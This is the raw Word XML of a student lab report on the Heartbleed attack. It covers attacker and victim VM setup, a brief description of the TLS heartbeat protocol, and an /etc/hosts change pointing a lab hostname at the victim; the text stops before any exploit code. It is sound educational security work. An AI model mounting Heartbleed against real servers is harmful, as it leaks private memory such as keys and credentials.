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BF59D" w14:textId="77777777" w:rsidR="00383904" w:rsidRDefault="00383904" w:rsidP="00383904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36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>CT-541 – NETWORK SECURITY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>MS-IS 004 2019/20</w:t>
      </w:r>
      <w:r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– Evening Fall 2019</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296A8AB7" w14:textId="77777777" w:rsidR="00383904" w:rsidRDefault="00383904" w:rsidP="00383904">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="775850A4" w14:textId="2279F12D" w:rsidR="00383904" w:rsidRDefault="00383904" w:rsidP="0038390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CT-541 NS Assignment-0</w:t>
      </w:r>
      <w:r w:rsidR="00FF7CD8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121A8C55" w14:textId="379D5435" w:rsidR="00383904" w:rsidRDefault="00383904" w:rsidP="0038390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  <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Heartbleed Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8649F6" w14:textId="11CC9E97" w:rsidR="00383904" w:rsidRDefault="00383904" w:rsidP="0038390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25B0503" wp14:editId="4B9AEEEC">
            <wp:extent cx="2133600" cy="2148840"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="1" name="Picture 1" descr="Image result for NED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ED Universit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014DE" w14:textId="77777777" w:rsidR="00383904" w:rsidRDefault="00383904" w:rsidP="00383904">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32BD72D3" w14:textId="77777777" w:rsidR="00383904" w:rsidRDefault="00383904" w:rsidP="00383904">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28EACAF7" w14:textId="77777777" w:rsidR="00383904" w:rsidRDefault="00383904" w:rsidP="0038390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TUDENT NAME: MUHAMMAD UMAR TARIQ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5279360E" w14:textId="079F19C9" w:rsidR="00383904" w:rsidRDefault="00383904" w:rsidP="0038390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ROLL </w:t>
      </w:r>
      <w:r w:rsidR="002B5F14">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>NUMBER:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> IS 004 2019/20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1B8623" w14:textId="77777777" w:rsidR="00383904" w:rsidRDefault="00383904" w:rsidP="0038390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URSE INSTRUCTOR: Dr. Mubashir M Khan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF5B865" w14:textId="77777777" w:rsidR="00383904" w:rsidRDefault="00383904" w:rsidP="00383904">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46AFBFB3" w14:textId="77777777" w:rsidR="00383904" w:rsidRDefault="00383904" w:rsidP="0038390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EPARTMENT OF COMPUTER SCIENCE &amp; INFORMATION TECHNOLOGY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5A1B07" w14:textId="4F80AD2D" w:rsidR="00383904" w:rsidRDefault="00383904" w:rsidP="0038390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NED UNIVERSITY, KARACHI CAMPUS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1680649A" w14:textId="56A025D6" w:rsidR="00E53635" w:rsidRDefault="00E53635" w:rsidP="0038390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8D85DEE" w14:textId="7F984F78" w:rsidR="00E53635" w:rsidRDefault="00E53635" w:rsidP="0038390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12DB0E6" w14:textId="20E8163D" w:rsidR="00E53635" w:rsidRDefault="00E53635" w:rsidP="00383904">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="-10139911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AC9C813" w14:textId="306284CE" w:rsidR="00E53635" w:rsidRDefault="00E53635">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="69C39042" w14:textId="004355B0" w:rsidR="00E53635" w:rsidRDefault="00E536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1939" w:history="1">
            <w:r w:rsidRPr="00554398">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Virtual Machines Configuration for Heartbleed Att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22CD" w14:textId="3936D4C1" w:rsidR="00E53635" w:rsidRDefault="00E536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48461940" w:history="1">
            <w:r w:rsidRPr="00554398">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Heartbeat Protoc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B863" w14:textId="3B5273AC" w:rsidR="00E53635" w:rsidRDefault="00E536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48461941" w:history="1">
            <w:r w:rsidRPr="00554398">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Heartbleed Att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845C" w14:textId="729057D0" w:rsidR="00E53635" w:rsidRDefault="00E536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48461942" w:history="1">
            <w:r w:rsidRPr="00554398">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Heartbleed Attack – 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8176" w14:textId="75D676FC" w:rsidR="00E53635" w:rsidRDefault="00E536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48461943" w:history="1">
            <w:r w:rsidRPr="00554398">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Malicious Heartbeat packets – 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D8680" w14:textId="469C3CA5" w:rsidR="00E53635" w:rsidRDefault="00E53635">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="02A9DBDC" w14:textId="49643527" w:rsidR="00E53635" w:rsidRDefault="00E53635" w:rsidP="0038390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457F5C9" w14:textId="5D7CD79D" w:rsidR="00E53635" w:rsidRDefault="00E53635" w:rsidP="0038390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96899B3" w14:textId="5CDD1E93" w:rsidR="00E53635" w:rsidRDefault="00E53635" w:rsidP="0038390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9EAD03C" w14:textId="304357AD" w:rsidR="00E53635" w:rsidRDefault="00E53635" w:rsidP="0038390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287656F" w14:textId="3F4B2825" w:rsidR="00E53635" w:rsidRDefault="00E53635" w:rsidP="0038390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14FDE98" w14:textId="301B4E2D" w:rsidR="00E53635" w:rsidRDefault="00E53635" w:rsidP="0038390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292EFD6" w14:textId="7A07B643" w:rsidR="00E53635" w:rsidRDefault="00E53635" w:rsidP="0038390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4E81A29" w14:textId="27404713" w:rsidR="00E53635" w:rsidRDefault="00E53635" w:rsidP="0038390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7F375DF" w14:textId="01FDE147" w:rsidR="00E53635" w:rsidRDefault="00E53635" w:rsidP="0038390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3B81E8A" w14:textId="49783B06" w:rsidR="00E53635" w:rsidRDefault="00E53635" w:rsidP="0038390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47D2A11" w14:textId="70C39102" w:rsidR="00E53635" w:rsidRDefault="00E53635" w:rsidP="0038390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99EFAD5" w14:textId="03096FA9" w:rsidR="00E53635" w:rsidRDefault="00E53635" w:rsidP="0038390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C0D554D" w14:textId="468E3993" w:rsidR="00E53635" w:rsidRDefault="00E53635" w:rsidP="0038390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9439BA3" w14:textId="11B690E3" w:rsidR="00E53635" w:rsidRDefault="00E53635" w:rsidP="0038390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3E111AF" w14:textId="0C70296A" w:rsidR="00E53635" w:rsidRDefault="00E53635" w:rsidP="0038390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5F17BE2" w14:textId="5C2A65AA" w:rsidR="00E53635" w:rsidRDefault="00E53635" w:rsidP="0038390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9BD4C73" w14:textId="6AE0A206" w:rsidR="002B5F14" w:rsidRDefault="002B5F14" w:rsidP="00E53635">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46B4A7E1" w14:textId="3EEB2568" w:rsidR="004849F8" w:rsidRDefault="004C0919" w:rsidP="004C0919">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc48461939"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Virtual Machines Configuration for Heartbleed Attack:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="5E06EC15" w14:textId="77777777" w:rsidR="004C0919" w:rsidRPr="004C0919" w:rsidRDefault="004C0919" w:rsidP="004C0919"/>
    <w:p w14:paraId="57ECA08F" w14:textId="3645E776" w:rsidR="002B5F14" w:rsidRDefault="002B5F14" w:rsidP="002B5F1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 need to create 2 Ubuntu ver. 12.04 32 Bit Virtual Machines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CD761B" w14:textId="4F408E58" w:rsidR="002B5F14" w:rsidRPr="002B5F14" w:rsidRDefault="002B5F14" w:rsidP="002B5F14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artbleed Victim Server</w:t>
      </w:r>
      <w:r w:rsidR="001A6E05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> VM IP = </w:t>
      </w:r>
      <w:r w:rsidR="001A6E05" w:rsidRPr="001A6E05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>10.0.2.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A5B6A3" w14:textId="46DEA8E4" w:rsidR="002B5F14" w:rsidRPr="004A2CF9" w:rsidRDefault="002B5F14" w:rsidP="002B5F14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artbleed Attacker VM</w:t>
      </w:r>
      <w:r w:rsidR="001A6E05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP = </w:t>
      </w:r>
      <w:r w:rsidR="004C0919" w:rsidRPr="001A6E05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>10.0.2.</w:t>
      </w:r>
      <w:r w:rsidR="004C0919">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433299C5" w14:textId="77777777" w:rsidR="004A2CF9" w:rsidRPr="004A2CF9" w:rsidRDefault="004A2CF9" w:rsidP="004A2CF9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D17699E" w14:textId="4D89ED1C" w:rsidR="00824658" w:rsidRPr="00824658" w:rsidRDefault="00824658" w:rsidP="0082465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 need to configure these two VM’s in NAT-Network Mode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79035D22" w14:textId="77777777" w:rsidR="004A2CF9" w:rsidRDefault="004A2CF9" w:rsidP="00824658">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4253333B" w14:textId="139FEAE7" w:rsidR="00824658" w:rsidRPr="00824658" w:rsidRDefault="00824658" w:rsidP="00824658">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00824658">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">IN NATNETWORK THERE WILL </w:t>
      </w:r>
      <w:r w:rsidRPr="00824658">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>BE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE14457" w14:textId="5400F17B" w:rsidR="00824658" w:rsidRPr="00824658" w:rsidRDefault="00824658" w:rsidP="00824658">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00824658">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Access from Outside Network </w:t>
      </w:r>
      <w:r w:rsidRPr="00824658">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>into</w:t>
      </w:r>
      <w:r w:rsidRPr="00824658">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> This Virtual Machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39077248" w14:textId="393E0F4A" w:rsidR="00824658" w:rsidRPr="00824658" w:rsidRDefault="00824658" w:rsidP="00824658">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00824658">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Network Between Host </w:t>
      </w:r>
      <w:r w:rsidRPr="00824658">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00824658">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Virtual Machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB8023B" w14:textId="3F5CB00B" w:rsidR="00824658" w:rsidRPr="00824658" w:rsidRDefault="00824658" w:rsidP="00824658">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00824658">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Network Between Virtual Machines Themselves.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F3F305" w14:textId="6E480F29" w:rsidR="002B5F14" w:rsidRDefault="00824658" w:rsidP="00824658">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00824658">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4. Access the Outside network using host as proxy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F98450" w14:textId="3655B15A" w:rsidR="00D2067A" w:rsidRDefault="00D2067A" w:rsidP="00633765">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10819DB1" w14:textId="1A17CBC4" w:rsidR="00D2067A" w:rsidRDefault="00224B94" w:rsidP="00224B94">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc48461940"/>
      <w:r>
        <w:t>Heartbeat Protocol:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="1DF0D68D" w14:textId="2B98CEE5" w:rsidR="00224B94" w:rsidRDefault="00224B94" w:rsidP="00224B94">
      <w:r>
        <w:t>It works on Heartbeat Request and Heartbeat Response.</w:t>
      </w:r>
      <w:r w:rsidRPr="00224B94">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Client</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sends a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HeartbeatRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> packet to the server. When the server receives it, it sends back a copy of the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">received message in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HeartbeatResponse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> packet. The goal is to keep the connection alive</w:t>
      </w:r>
      <w:r w:rsidR="009B7444">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2045DEA4" w14:textId="337B0871" w:rsidR="00BC0BAD" w:rsidRDefault="00BC0BAD" w:rsidP="00224B94"/>
    <w:p w14:paraId="11FFA47E" w14:textId="175631E8" w:rsidR="00BC0BAD" w:rsidRDefault="00BC0BAD" w:rsidP="00224B94"/>
    <w:p w14:paraId="60C54EFC" w14:textId="0C73F680" w:rsidR="00BC0BAD" w:rsidRDefault="00BC0BAD" w:rsidP="00224B94"/>
    <w:p w14:paraId="57C4394E" w14:textId="1DD75701" w:rsidR="00BC0BAD" w:rsidRDefault="00BC0BAD" w:rsidP="00224B94"/>
    <w:p w14:paraId="693189E4" w14:textId="2C83E970" w:rsidR="00BC0BAD" w:rsidRDefault="00BC0BAD" w:rsidP="00224B94"/>
    <w:p w14:paraId="5B9F3FF5" w14:textId="076584C8" w:rsidR="00BC0BAD" w:rsidRDefault="00BC0BAD" w:rsidP="00224B94"/>
    <w:p w14:paraId="5CA399E9" w14:textId="0B5474C3" w:rsidR="00BC0BAD" w:rsidRDefault="00BC0BAD" w:rsidP="00224B94"/>
    <w:p w14:paraId="42100CA5" w14:textId="7CC1EB6E" w:rsidR="00BC0BAD" w:rsidRDefault="00BC0BAD" w:rsidP="00224B94"/>
    <w:p w14:paraId="3671E4D4" w14:textId="4A647B3F" w:rsidR="00BC0BAD" w:rsidRDefault="00BC0BAD" w:rsidP="00224B94"/>
    <w:p w14:paraId="0BD8FEC0" w14:textId="1EB1BD94" w:rsidR="00BC0BAD" w:rsidRDefault="00BC0BAD" w:rsidP="00224B94"/>
    <w:p w14:paraId="23C2A897" w14:textId="77777777" w:rsidR="00BC0BAD" w:rsidRDefault="00BC0BAD" w:rsidP="00224B94"/>
    <w:p w14:paraId="5FE24C2D" w14:textId="7DCA69D1" w:rsidR="009B7444" w:rsidRDefault="00BC0BAD" w:rsidP="009B7444">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc48461941"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Heartbleed Attack:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="15CF4116" w14:textId="77777777" w:rsidR="00BC0BAD" w:rsidRPr="00633765" w:rsidRDefault="00BC0BAD" w:rsidP="00BC0BAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00633765">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>We need to modify the /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00633765">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00633765">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/hosts file on the attacker machine to map the server name to the IP addres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33765">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>of the server VM. Search the following line in /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00633765">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00633765">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/hosts, and replace the IP address 127.0.0.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33765">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>with the actual IP address of the server VM that hosts the ELGG application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B009580" w14:textId="77777777" w:rsidR="00BC0BAD" w:rsidRDefault="00BC0BAD" w:rsidP="00BC0BA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n </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Heartbleed Attacker VM = </w:t>
      </w:r>
      <w:r w:rsidRPr="001A6E05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>10.0.2.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633765">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>in /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00633765">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00633765">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7074254A" w14:textId="77777777" w:rsidR="00BC0BAD" w:rsidRDefault="00BC0BAD" w:rsidP="00BC0BA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hange </w:t>
      </w:r>
      <w:r w:rsidRPr="00633765">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1 </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00CB27E6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:bCs/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>www.heartbleedlabelgg.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C78743" w14:textId="77777777" w:rsidR="00BC0BAD" w:rsidRDefault="00BC0BAD" w:rsidP="00BC0BA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0.0.2.7 </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00CB27E6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:bCs/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>www.heartbleedlabelgg.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="594A6345" w14:textId="77777777" w:rsidR="00BC0BAD" w:rsidRPr="00BC0BAD" w:rsidRDefault="00BC0BAD" w:rsidP="00BC0BAD"/>
    <w:p w14:paraId="080C4681" w14:textId="59F969E6" w:rsidR="00BC0BAD" w:rsidRDefault="00BC0BAD" w:rsidP="00BC0BAD"/>
    <w:p w14:paraId="50608EBF" w14:textId="3748059C" w:rsidR="00BC0BAD" w:rsidRPr="00BC0BAD" w:rsidRDefault="00BC0BAD" w:rsidP="00BC0BAD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="610BF568" wp14:editId="0A533BDF">
            <wp:extent cx="5943600" cy="3136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EF85" w14:textId="3F72A4C0" w:rsidR="004A2CF9" w:rsidRDefault="004A2CF9" w:rsidP="00824658">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
